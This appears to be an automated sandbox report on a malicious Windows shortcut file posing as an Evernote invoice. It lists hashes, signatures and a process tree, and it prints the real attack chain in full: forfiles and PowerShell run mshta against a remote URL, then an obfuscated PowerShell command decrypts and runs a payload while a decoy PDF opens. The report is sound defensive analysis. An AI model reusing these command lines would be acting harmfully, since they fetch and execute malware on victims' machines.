Analysis
-
max time kernel:   121s
max time network:  123s
platform:          windows7_x64
resource:          win7-20240508-en
resource tags:     arch:x64, arch:x86, image:win7-20240508-en, locale:en-us, os:windows7-x64, system
submitted:         17-05-2024 01:39
Static task: static1

Behavioral task: behavioral1
  Sample:   84297536d9873d971dcc783ae2f95af8cbf32c65fccf3c8687af2ba5294b7f30.lnk
  Resource: win7-20240508-en

Behavioral task: behavioral2
  Sample:   84297536d9873d971dcc783ae2f95af8cbf32c65fccf3c8687af2ba5294b7f30.lnk
  Resource: win10v2004-20240508-en
General
-
Target:  84297536d9873d971dcc783ae2f95af8cbf32c65fccf3c8687af2ba5294b7f30.lnk
Size:    148KB
MD5:     d39a73de9f109e3dba408e9481998206
SHA1:    30651dada81443db0fde9c3a336955d27b6d9024
SHA256:  84297536d9873d971dcc783ae2f95af8cbf32c65fccf3c8687af2ba5294b7f30
SHA512:  09c8954ecabbeb36aeb8804858168eb1448f5894c1641a1ba5311f2b33aaeb24814734d0b1f7e777f22910c53bb9df500801907a603d8d71fba139705f444d61
SSDEEP:  24:8WEe6Dz358m+pyAWkr+/4x+sPxZvBG0qdd79ds/Z6U/ab9Q9qFBm:8WENDzKvZbnvBG7dJ9A6U/a5QW
Malware Config
-
Extracted: https://invoiceinformations.com/InvoiceInfo/Evernote-Invoice
Signatures
-
Blocklisted process makes network request  3 IoCs
Processes: mshta.exe, powershell.exe
  flow  pid   process
  4     2688  mshta.exe
  7     2688  mshta.exe
  8     2400  powershell.exe
-
Downloads MZ/PE file
-
Drops file in Windows directory  2 IoCs
Processes: powershell.exe, powershell.exe
  description                   ioc                                                                                                                  process
  File opened for modification  C:\Windows\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk  powershell.exe
  File opened for modification  C:\Windows\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk  powershell.exe
-
Enumerates physical storage devices  1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies Internet Explorer settings
Processes: mshta.exe
  description  ioc                                                                                                 process
  Key created  \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Main  mshta.exe
-
Suspicious behavior: EnumeratesProcesses  2 IoCs
Processes: powershell.exe, powershell.exe
  pid   process
  2652  powershell.exe
  2400  powershell.exe
-
Suspicious behavior: GetForegroundWindowSpam  1 IoCs
Processes: AcroRd32.exe
  pid   process
  2492  AcroRd32.exe
-
Suspicious use of AdjustPrivilegeToken  2 IoCs
Processes: powershell.exe, powershell.exe
  description               pid   process
  Token: SeDebugPrivilege   2652  powershell.exe
  Token: SeDebugPrivilege   2400  powershell.exe
-
Suspicious use of SetWindowsHookEx  3 IoCs
Processes: AcroRd32.exe
  pid   process
  2492  AcroRd32.exe
  2492  AcroRd32.exe
  2492  AcroRd32.exe
-
Suspicious use of WriteProcessMemory  16 IoCs
Processes: cmd.exe, forfiles.exe, powershell.exe, mshta.exe, powershell.exe
  description                        pid   process         target process
  PID 2224 wrote to memory of 2668   2224  cmd.exe         forfiles.exe
  PID 2224 wrote to memory of 2668   2224  cmd.exe         forfiles.exe
  PID 2224 wrote to memory of 2668   2224  cmd.exe         forfiles.exe
  PID 2668 wrote to memory of 2652   2668  forfiles.exe    powershell.exe
  PID 2668 wrote to memory of 2652   2668  forfiles.exe    powershell.exe
  PID 2668 wrote to memory of 2652   2668  forfiles.exe    powershell.exe
  PID 2652 wrote to memory of 2688   2652  powershell.exe  mshta.exe
  PID 2652 wrote to memory of 2688   2652  powershell.exe  mshta.exe
  PID 2652 wrote to memory of 2688   2652  powershell.exe  mshta.exe
  PID 2688 wrote to memory of 2400   2688  mshta.exe       powershell.exe
  PID 2688 wrote to memory of 2400   2688  mshta.exe       powershell.exe
  PID 2688 wrote to memory of 2400   2688  mshta.exe       powershell.exe
  PID 2400 wrote to memory of 2492   2400  powershell.exe  AcroRd32.exe
  PID 2400 wrote to memory of 2492   2400  powershell.exe  AcroRd32.exe
  PID 2400 wrote to memory of 2492   2400  powershell.exe  AcroRd32.exe
  PID 2400 wrote to memory of 2492   2400  powershell.exe  AcroRd32.exe
Processes
-
1. C:\Windows\system32\cmd.exe
   Command line: cmd /c C:\Users\Admin\AppData\Local\Temp\84297536d9873d971dcc783ae2f95af8cbf32c65fccf3c8687af2ba5294b7f30.lnk
   - Suspicious use of WriteProcessMemory
   2. C:\Windows\System32\forfiles.exe
      Command line: "C:\Windows\System32\forfiles.exe" /p C:\Windows /m write.exe /c "powershell . mshta https://invoiceinformations.com/InvoiceInfo/Evernote-Invoice"
      - Suspicious use of WriteProcessMemory
      3. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
         Command line: . mshta https://invoiceinformations.com/InvoiceInfo/Evernote-Invoice
         - Drops file in Windows directory
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of AdjustPrivilegeToken
         - Suspicious use of WriteProcessMemory
         4. C:\Windows\system32\mshta.exe
            Command line: "C:\Windows\system32\mshta.exe" https://invoiceinformations.com/InvoiceInfo/Evernote-Invoice
            - Blocklisted process makes network request
            - Modifies Internet Explorer settings
            - Suspicious use of WriteProcessMemory
            5. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
               Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function NDkpzB($PbutE){return -split ($PbutE -replace '..', '0x$& ')};$FgMPQtR = NDkpz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couF = [System.Security.Cryptography.Aes]::Create();$UcouF.Key = NDkpzB('415450574E64494F4F6C5A7742707268');$UcouF.IV = New-Object byte[] 16;$seVZtfGD = $UcouF.CreateDecryptor();$mamDBHAHL = $seVZtfGD.TransformFinalBlock($FgMPQtR, 0, $FgMPQtR.Length);$bZUJiekdW = [System.Text.Encoding]::Utf8.GetString($mamDBHAHL);$seVZtfGD.Dispose();& $bZUJiekdW.Substring(0,3) $bZUJiekdW.Substring(3)
               - Blocklisted process makes network request
               - Drops file in Windows directory
               - Suspicious behavior: EnumeratesProcesses
               - Suspicious use of AdjustPrivilegeToken
               - Suspicious use of WriteProcessMemory
               6. C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
                  Command line: "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Roaming\Evernote-Supplemental-Terms.pdf"
                  - Suspicious behavior: GetForegroundWindowSpam
                  - Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
-
C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents
  Filesize: 3KB
  MD5:      408e13d3f9eb2f9cdf51c7818b172712
  SHA1:     248d573ec1887dad21a337759a24abd3234a447f
  SHA256:   f79ef94e981079f9e1f4cdd8305404564174bc120e45bea9e9fad643137b6411
  SHA512:   5f436bc3ceb5faf6acd6fb718479efff358e254381f31e6808b7a3d6f67643ffb17e6bc66423ad9dda972a410c5c9d27436fe7798573a8303e1f721fbfde864e
-
C:\Users\Admin\AppData\Roaming\Evernote-Supplemental-Terms.pdf
  Filesize: 70KB
  MD5:      508c98b92beb1aac53108149273aeb18
  SHA1:     434698e85e6bf7e1989212ce99d3b3e0a6b5171d
  SHA256:   861b8186ac5e7157ff17abe83c9aff3856113d43adf3bae520f93d75940c9c46
  SHA512:   08dfe9c8809bbf0ff03add0025a29e23834b9f37f926c1b9646e5cf217e690cd77872df90a8b2a71f18beb9334a547aa0eb2d26c1fcc423f95e1c19ee42d932f
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FKSCWYTRHOE7CPNV6V8W.temp
  Filesize: 7KB
  MD5:      81256cae7a194d4011afd5eeb02fe918
  SHA1:     ac0de0ab1149d05446268d9fa93f6bdcf03c5546
  SHA256:   dbe07ee03f5b24db883f46be83d9432b491feb6926fecc8a528255300ec0ed1b
  SHA512:   4585c9450a27147a109af8aa570e50260fdd574693103a112c6879d3e808650298f0b5758fb7e700d56c03fa75bdee71a61f66aa71eb4f8bb36a8b4516e5d8de
-
memory/2400-68-0x000000001B4A0000-0x000000001B782000-memory.dmp
  Filesize: 2.9MB
-
memory/2400-69-0x0000000002810000-0x0000000002818000-memory.dmp
  Filesize: 32KB
-
memory/2652-40-0x000007FEF5A5E000-0x000007FEF5A5F000-memory.dmp
  Filesize: 4KB
-
memory/2652-41-0x000000001B6C0000-0x000000001B9A2000-memory.dmp
  Filesize: 2.9MB
-
memory/2652-42-0x00000000026F0000-0x00000000026F8000-memory.dmp
  Filesize: 32KB
-
memory/2652-43-0x000007FEF57A0000-0x000007FEF613D000-memory.dmp
  Filesize: 9.6MB
-
memory/2652-44-0x000007FEF57A0000-0x000007FEF613D000-memory.dmp
  Filesize: 9.6MB
-
memory/2652-45-0x000007FEF57A0000-0x000007FEF613D000-memory.dmp
  Filesize: 9.6MB
-
memory/2652-46-0x000007FEF57A0000-0x000007FEF613D000-memory.dmp
  Filesize: 9.6MB